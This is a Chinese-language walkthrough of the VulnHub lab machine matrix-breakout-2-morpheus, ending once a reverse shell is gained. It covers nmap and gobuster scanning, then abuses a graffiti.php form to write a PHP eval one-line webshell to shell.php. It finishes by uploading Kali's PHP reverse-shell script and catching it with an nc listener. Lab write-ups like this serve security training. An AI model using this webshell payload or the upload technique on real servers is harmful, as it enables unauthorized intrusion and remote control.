matrix-breakout-2-morpheus 靶机----练习攻略 【仅获取shell】

发布于:2025-03-20 ⋅ 阅读:(13) ⋅ 点赞:(0)

【此练习仅做到反弹shell】

1.靶机下载地址

https://download.vulnhub.com/matrix-breakout/matrix-breakout-2-morpheus.ova

2. 打开靶机,kali使用nmap扫描同C段的主机  找到靶机ip

确保靶机和kali网卡均为NAT模式

先查看kali的ip

nmap 192.168.182.1/24       排除物理机、网关、kali等,可得出靶机ip为  192.168.182.162、

以及开启端口:22 ssh、80 http 、81  hosts2-ns

3.  直接通过ip访问页面   发现无法ssh,以及关键词Trinity

4.  kali的dirb扫描敏感目录

发现 /robots.txt文件、

以及js脚本文件: /javascript/jquery        、  /javascript/jquery/jquery

5. 访问多个目录的网址

ip/robots.txt  无任何信息

 /javascript/jquery  无权限访问

/javascript/jquery/jquery      页面源代码

无有效结果,换其他方式扫描目录

6.  使用gobuster再次扫描

输入:gobuster dir -u http://192.168.182.162 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.zip

注意:

发现无gobuster ,kali使用apt命令进行安装:apt install gobuster。

如果无法找到软件包,请先更新apt命令:apt update。

再安装gobuster即可。

安装完成,再次执行开始的那条命令。

扫描结果,发现 /robots.txt   、 /graffiti.txt   、   /graffiti.php  三个可用 文件

7.对 /graffiti.txt   、   /graffiti.php 进行访问

在 graffiti.php 页面发现输入框

8.在输入框输入123456,点击Post,发现页面显示出该内容

9. 尝试输入一句话木马

输入:<?php @eval($_POST[cmd]);?>

抓包,发现将数据提交到 graffiti.txt文件中

将message值改为一句话木马,目标文件改为shell.php文件。发行,关闭拦截。

10. 访问shell.php文件,蚁剑进行连接

11. 找到kali自带的反弹shell文件,复制内容到物理机保存为1.php

kali:

cd /usr/share/webshells/

cd php

cat php-reverse-shell.php

12. 修改ip和端口

13. 将 1.php文件通过蚁剑上传到靶机中

14.kali的nc监听6654端口,浏览器访问上传的1.php,反弹shell

监听返回了shell,输入whoami验证,成功。

此练习仅做到反弹shell。

练习结束,反弹shell可通过kali的自带反弹shell文件,上传文件并访问获取shell。

对大家能有些许帮助最好,没有的话请见谅。

再见。。。

                                                                                           ----------------2025/3/19  21:52